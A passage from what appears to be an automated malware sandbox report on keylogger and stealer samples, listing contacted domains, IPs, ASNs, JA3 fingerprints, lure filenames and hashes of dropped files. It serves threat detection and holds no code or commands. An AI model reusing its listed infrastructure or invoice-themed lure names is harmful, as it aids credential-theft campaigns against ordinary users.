                                                    • checkip.dyndns.org/
                                                    Payment_Draft_confirmation.xla.xlsxGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • checkip.dyndns.org/
                                                    #U83e0#U841d#U5305#U8f7b#U5c0f#U8bf4 5.0.36.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • checkip.dyndns.org/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    mail.qoldenfrontier.comRemittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 108.167.142.65
                                                    checkip.dyndns.comDEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 132.226.8.169
                                                    SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                    • 193.122.130.0
                                                    SecuriteInfo.com.PUA.Tool.InstSrv.10.27384.30600.exeGet hashmaliciousUnknownBrowse
                                                    • 193.122.6.168
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 158.101.44.242
                                                    ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.docGet hashmaliciousSnake KeyloggerBrowse
                                                    • 193.122.6.168
                                                    order.exeGet hashmaliciousUnknownBrowse
                                                    • 158.101.44.242
                                                    0FvHGK2cyk.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 193.122.6.168
                                                    M0uVrW4HJb.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
                                                    • 132.226.247.73
                                                    rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 132.226.247.73
                                                    scratchdreams.tkDEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 172.67.169.18
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.169.18
                                                    PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    58208 Teklif.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.169.18
                                                    Zarefy4bOs.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Remittance_copy.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Purchase Order.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    Fuy2BDS9W2.exeGet hashmaliciousPureLog Stealer, RedLine, Snake KeyloggerBrowse
                                                    • 104.21.27.85
                                                    reallyfreegeoip.orgDEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    rSyDiExlek.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    Pnihosiyvr.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    BmLue8t2V7.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    gZIZ5eyCtS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    edlyEKgpaz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 104.21.67.152
                                                    PsBygexGwH.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    CLOUDFLARENETUSMegaUniversesMQ.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    EPQ.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.12.205
                                                    file.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 104.26.5.15
                                                    http://www.corpsierramadre.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.93.126
                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    MegaUniversesMQ.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                    • 104.20.4.235
                                                    AKAMAI-ASUShttps://postoffice.adobe.com/po-server/link/redirect?target=eyJhbGciOiJIUzUxMiJ9.eyJ0ZW1wbGF0ZSI6ImNjX2NvbGxhYl9kY3NoYXJpbmdfdmlld19lbWFpbCIsImVtYWlsQWRkcmVzcyI6ImJhc2FsaW5yZWljQGdtYWlsLmNvbSIsInJlcXVlc3RJZCI6ImZiNDJhMDI2LWFkYWMtNGUwNS01N2IyLWJiMTJmMWQ2ZjFmNSIsImxpbmsiOiJodHRwczovL2Fjcm9iYXQuYWRvYmUuY29tL2lkL3VybjphYWlkOnNjOlZBNkMyOmJkNjM3YjUxLTcwNmEtNDg4Ni05MjZkLTA2ZjM5NTI0YWZmMCIsImxhYmVsIjoiMTIiLCJsb2NhbGUiOiJlbl9VUyJ9.nBjy2vHS9kz9dh9gF6utGztizGQUAyT8p2Xs_LMlQGFyIPy7jWdbqBvo7EWIO0M0gFEWfg1FhrU_boE4Fc2VGwGet hashmaliciousUnknownBrowse
                                                    • 23.209.57.57
                                                    file.exeGet hashmaliciousVidarBrowse
                                                    • 104.105.90.131
                                                    vylI38MZOn.elfGet hashmaliciousMiraiBrowse
                                                    • 23.44.181.13
                                                    JdlqBuKl3n.elfGet hashmaliciousMiraiBrowse
                                                    • 72.247.1.106
                                                    L31owFeEHg.elfGet hashmaliciousMiraiBrowse
                                                    • 23.218.112.21
                                                    KFOxk19cHL.elfGet hashmaliciousMiraiBrowse
                                                    • 104.91.41.146
                                                    WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                    • 104.104.85.160
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 184.26.41.138
                                                    http://goofle.comGet hashmaliciousUnknownBrowse
                                                    • 23.40.179.53
                                                    file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                    • 23.210.138.105
                                                    CLOUDFLARENETUSMegaUniversesMQ.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    EPQ.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 104.26.12.205
                                                    file.exeGet hashmaliciousRisePro StealerBrowse
                                                    • 104.26.5.15
                                                    http://www.corpsierramadre.com/Get hashmaliciousUnknownBrowse
                                                    • 104.21.93.126
                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                    • 172.67.215.45
                                                    MegaUniversesMQ.exeGet hashmaliciousUnknownBrowse
                                                    • 172.64.41.3
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 104.26.12.205
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.74.152
                                                    https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                    • 104.17.2.184
                                                    1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                    • 104.20.4.235
                                                    UNIFIEDLAYER-AS-1USPI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 162.240.81.18
                                                    Purchase Order_pdf.exe.gz.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 192.185.166.221
                                                    https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                    • 192.185.84.89
                                                    https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                    • 192.185.84.89
                                                    https://smart-doc.ontralink.com/c/s/6jUq/6u7/6/2/v/6A6CqU/UUcaCU2l1B/P/P/eGet hashmaliciousHTMLPhisherBrowse
                                                    • 192.185.84.89
                                                    FedEx DOC_773690995161.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 192.185.166.221
                                                    InvoiceDemurrage.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 67.20.116.106
                                                    NOA, BL and invoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 50.87.150.204
                                                    https://epaidea.com/wp-includes/vh/c.htmlGet hashmaliciousUnknownBrowse
                                                    • 192.185.153.106
                                                    https://bing.com///////////////////////////ck/a?!&&p=9800195a72dfec27JmltdHM9MTcxNDM0ODgwMCZpZ3VpZD0yOWFmMGU4ZS02MTgwLTY4NDUtMWIwOC0xYWJkNjBhYTY5MGImaW5zaWQ9NTIxNg&ptn=3&ver=2&hsh=3&fclid=29af0e8e-6180-6845-1b08-1abd60aa690b&psq=https%3A%2F%2F9dcare.com.au&u=a1aHR0cHM6Ly93d3cuOWRjYXJlLmNvbS5hdS9hYm91dC11cy8Get hashmaliciousHTMLPhisherBrowse
                                                    • 192.185.120.19

                                                    JA3 Fingerprints

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    54328bd36c14bd82ddaa0c04b25ed9ad1nS3mkPS10.exeGet hashmaliciousLimeRATBrowse
                                                    • 172.67.177.134
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    https://docs.google.com/presentation/d/e/2PACX-1vRA7cYu2pjKyfaCRROgTu4J2OpPGWE_raEqtGhCVl21QDvJzZsVPQtIU_FG6khcCjqxbwzOTOoBBBx6/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                    • 172.67.177.134
                                                    DEKONT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                    • 172.67.177.134
                                                    SecuriteInfo.com.Win64.TrojanX-gen.11161.10776.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                    • 172.67.177.134
                                                    https://docs.google.com/presentation/d/e/2PACX-1vTSXaY7ubI0TsmtDZGhnfi1zhnSxguMyu2LhG-ysNsdY7OPzg5AMGaTqcxwu9_JVEAMwiEcyOI9wHoz/pub?start=false&loop=false&delayms=3000&slide=id.pGet hashmaliciousUnknownBrowse
                                                    • 172.67.177.134
                                                    hRsK5gPX8l.exeGet hashmaliciousXehook StealerBrowse
                                                    • 172.67.177.134
                                                    T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                    • 172.67.177.134
                                                    T1SEuO2fxi.exeGet hashmaliciousXehook StealerBrowse
                                                    • 172.67.177.134
                                                    3b5074b1b5d032e5620f69f9f700ff0eEPQ.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    SWIFT COPY.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    SecuriteInfo.com.Win32.PWSX-gen.1403.24614.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    Swift-Message01052024002ML_qdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    Specification 1223.vbsGet hashmaliciousAgentTeslaBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    Tapril-30-receipt.vbsGet hashmaliciousRemcosBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    CARTASCONF_PDF.vbsGet hashmaliciousUnknownBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18
                                                    SWIFT_Details#64737389.vbsGet hashmaliciousUnknownBrowse
                                                    • 172.67.141.195
                                                    • 172.67.169.18

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):0.7067125840780447
                                                    Encrypted:false
                                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq8:2JIB/wUKUKQncEmYRTwh0A
                                                    MD5:FBA1EBA67D48EFD6082412A4BC17A03F
                                                    SHA1:1185C72E9E4C9943C88AFB941DA811AF18EBF96C
                                                    SHA-256:6D3292221AC71FFDD57E4A861CF1D152D8F022DD39A455442A2573F9579A37AD
                                                    SHA-512:04F4413C425C9EC1A152B8240DF32F34A3AEA9BFC8D64D3C534BE43DEA52CF509CF9072A311C41A0DF8E14946C8CE79C36E95B69F5B7B0DD201959471909DCA7
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd9fe882d, page size 16384, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):1310720
                                                    Entropy (8bit):0.7899680894856709
                                                    Encrypted:false
                                                    SSDEEP:1536:bSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:bazaPvgurTd42UgSii
                                                    MD5:79BEF46783EF92BF264A68DF9419FD57
                                                    SHA1:962A4F9713BBFEF0E8D5DB28260857C7F304BE72
                                                    SHA-256:2E026480D67E5715E7C71FC77F35B9D84B4F2C6BFAE4DBC11344325887B33103
                                                    SHA-512:E08DBDD9A33E479E3B99636E93D6E1EF968118B4CD426FC628E801B14439D1AE95A5B1C33AF8742E9044C2ADE4E75AACEF36BC3BE60287980D1C653B5AD5181E
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...-... ...............X\...;...{......................0.`.....42...{5......|A.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................@.3e.....|....................9D.....|a..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                    Download File
                                                    Process:C:\Windows\System32\svchost.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.08220881982324885
                                                    Encrypted:false
                                                    SSDEEP:3:9Dl/EYeeRpIkqNt/57Dek3JuYgIvollEqW3l/TjzzQ/t:3Ez8pIkqPR3tdgIQmd8/
                                                    MD5:AD5AC5435094ACB44C002C278CF1AA80
                                                    SHA1:3987FEABF118C51DA0658D17E6988CA9E33679DD
                                                    SHA-256:C14E7058B09BD2AD36AC4F707D8D224072AC68E04AF937E98599784A7572F69D
                                                    SHA-512:5D0B02E704C218597D917D0AB667F97F9FFEF19E4274A7DAB2436317776F39A673AEC36B8CDF2F3BC3376169680F4C64D881C060BA6FD4BE91A258CD7163F34B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:./.?.....................................;...{.......|a.42...{5.........42...{5.42...{5...Y.42...{59..................9D.....|a.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\Public\Payment_Advice.pdf

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PDF document, version 1.4, 1 pages
                                                    Category:dropped
                                                    Size (bytes):502695
                                                    Entropy (8bit):7.210153211803877
                                                    Encrypted:false
                                                    SSDEEP:6144:64zLGoksGfh1BpNxE/Tb4CvJLGOwSc/12r3Or/WBo8YFISKYPaA9nFw2N3eNCW1:6SiscDS/PvJSSW2rIF8YwYt9nFw2RLW1
                                                    MD5:7FB38EC672E93118DE75747E60232837
                                                    SHA1:32313AB4489CBC195637C8E3B62BDD799A54D1B7
                                                    SHA-256:80E8B1A5F0008B00EE033242975E238B68127CBDE39ABB97CE7EC6147138AB94
                                                    SHA-512:3E969865C47A16BF75B14D5C423CFA2D6BDB2F278F320EEAE3160C28C8D8A454F8AD97B936F4F08681A104321316A94EFA1D089F20F0AF22E1D591E474A1BBD8
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:%PDF-1.4..%......1 0 obj..<<../Type /Page../MediaBox [ 0 0 595 842 ]../Resources << /XObject << /X0 3 0 R >> >>../Contents 4 0 R../Parent 2 0 R../Rotate 360..>>..endobj..3 0 obj..<<../Type /XObject../Subtype /Image../Width 2480../Height 3509../BitsPerComponent 8../ColorSpace /DeviceRGB../Filter /DCTDecode../Length 501818..>>..stream.......C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(..

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):297
                                                    Entropy (8bit):5.254765038789286
                                                    Encrypted:false
                                                    SSDEEP:6:DtVqM+q2PcNwi2nKuAl9OmbnIFUt86tkSZZmw+6t9MVkwOcNwi2nKuAl9OmbjLJ:DTqM+vLZHAahFUt866m/+63MV54ZHAae
                                                    MD5:844D98E17F7347B5DF4EC5571829510F
                                                    SHA1:C735F791546F3F8F43B6D0DD4CEEC32D7643BB36
                                                    SHA-256:F9453BD15A83A8BF54B6D15F0BF43A220EFA216430200B7E07E52E4EF5D232A7
                                                    SHA-512:C5E28F61DA34BED704D9AF73D8CCBFF2F92F306EA0DBF479136FD5BCBD5F557654444D977203465CDCD44E987D564E2360B0AA33895B294109C03790C903B8C6
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/05/01-15:17:08.909 b6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/01-15:17:08.910 b6c Recovering log #3.2024/05/01-15:17:08.911 b6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):297
                                                    Entropy (8bit):5.254765038789286
                                                    Encrypted:false
                                                    SSDEEP:6:DtVqM+q2PcNwi2nKuAl9OmbnIFUt86tkSZZmw+6t9MVkwOcNwi2nKuAl9OmbjLJ:DTqM+vLZHAahFUt866m/+63MV54ZHAae
                                                    MD5:844D98E17F7347B5DF4EC5571829510F
                                                    SHA1:C735F791546F3F8F43B6D0DD4CEEC32D7643BB36
                                                    SHA-256:F9453BD15A83A8BF54B6D15F0BF43A220EFA216430200B7E07E52E4EF5D232A7
                                                    SHA-512:C5E28F61DA34BED704D9AF73D8CCBFF2F92F306EA0DBF479136FD5BCBD5F557654444D977203465CDCD44E987D564E2360B0AA33895B294109C03790C903B8C6
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:2024/05/01-15:17:08.909 b6c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/01-15:17:08.910 b6c Recovering log #3.2024/05/01-15:17:08.911 b6c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):344
                                                    Entropy (8bit):5.158101134701621
                                                    Encrypted:false
                                                    SSDEEP:6:DtQ+L+q2PcNwi2nKuAl9Ombzo2jMGIFUt86t1h/KWZmw+6t1hsLVkwOcNwi2nKuA:DG+L+vLZHAa8uFUt86fcW/+6f+LV54Zg
                                                    MD5:B734EB51166A26337004AA60EE0C9657
                                                    SHA1:7A9AA2DEB8480B5FE51B5C9D9C234EF1A7B0466A
                                                    SHA-256:A9A32002BB03484253722834046DEE5C7746A8694EA2A44AFBFC6002906D2E47
                                                    SHA-512:70A93E26662E755C0C092979DC2D09A069D8F5B5E28D4CCA2EB2CE1EE2540F687573152AA6C1E46B2550734A4A88B6A171B8A1422A98CF0F5BB7088560D99ECD
                                                    Malicious:false
                                                    Preview:2024/05/01-15:17:09.350 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/01-15:17:10.255 1ccc Recovering log #3.2024/05/01-15:17:10.256 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):344
                                                    Entropy (8bit):5.158101134701621
                                                    Encrypted:false
                                                    SSDEEP:6:DtQ+L+q2PcNwi2nKuAl9Ombzo2jMGIFUt86t1h/KWZmw+6t1hsLVkwOcNwi2nKuA:DG+L+vLZHAa8uFUt86fcW/+6f+LV54Zg
                                                    MD5:B734EB51166A26337004AA60EE0C9657
                                                    SHA1:7A9AA2DEB8480B5FE51B5C9D9C234EF1A7B0466A
                                                    SHA-256:A9A32002BB03484253722834046DEE5C7746A8694EA2A44AFBFC6002906D2E47
                                                    SHA-512:70A93E26662E755C0C092979DC2D09A069D8F5B5E28D4CCA2EB2CE1EE2540F687573152AA6C1E46B2550734A4A88B6A171B8A1422A98CF0F5BB7088560D99ECD
                                                    Malicious:false
                                                    Preview:2024/05/01-15:17:09.350 1ccc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/01-15:17:10.255 1ccc Recovering log #3.2024/05/01-15:17:10.256 1ccc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\4b141779-8272-4dee-8709-72b82cd279c6.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.969814904260269
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                    MD5:7BE9C8316EB1B7252CB363207744A145
                                                    SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                    SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                    SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.969814904260269
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                    MD5:7BE9C8316EB1B7252CB363207744A145
                                                    SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                    SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                    SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF65e10e.TMP (copy)

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):475
                                                    Entropy (8bit):4.969814904260269
                                                    Encrypted:false
                                                    SSDEEP:12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby
                                                    MD5:7BE9C8316EB1B7252CB363207744A145
                                                    SHA1:57861355BE6541501AED40F896891579DCF473BF
                                                    SHA-256:B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D
                                                    SHA-512:2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB
                                                    Malicious:false
                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341052428587673","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146366},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.7","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f852accf-f28f-4ae2-8d30-4d118b5cda62.tmp

                                                    Download File
                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    File Type:JSON data
                                                    Category:modified
                                                    Size (bytes):475
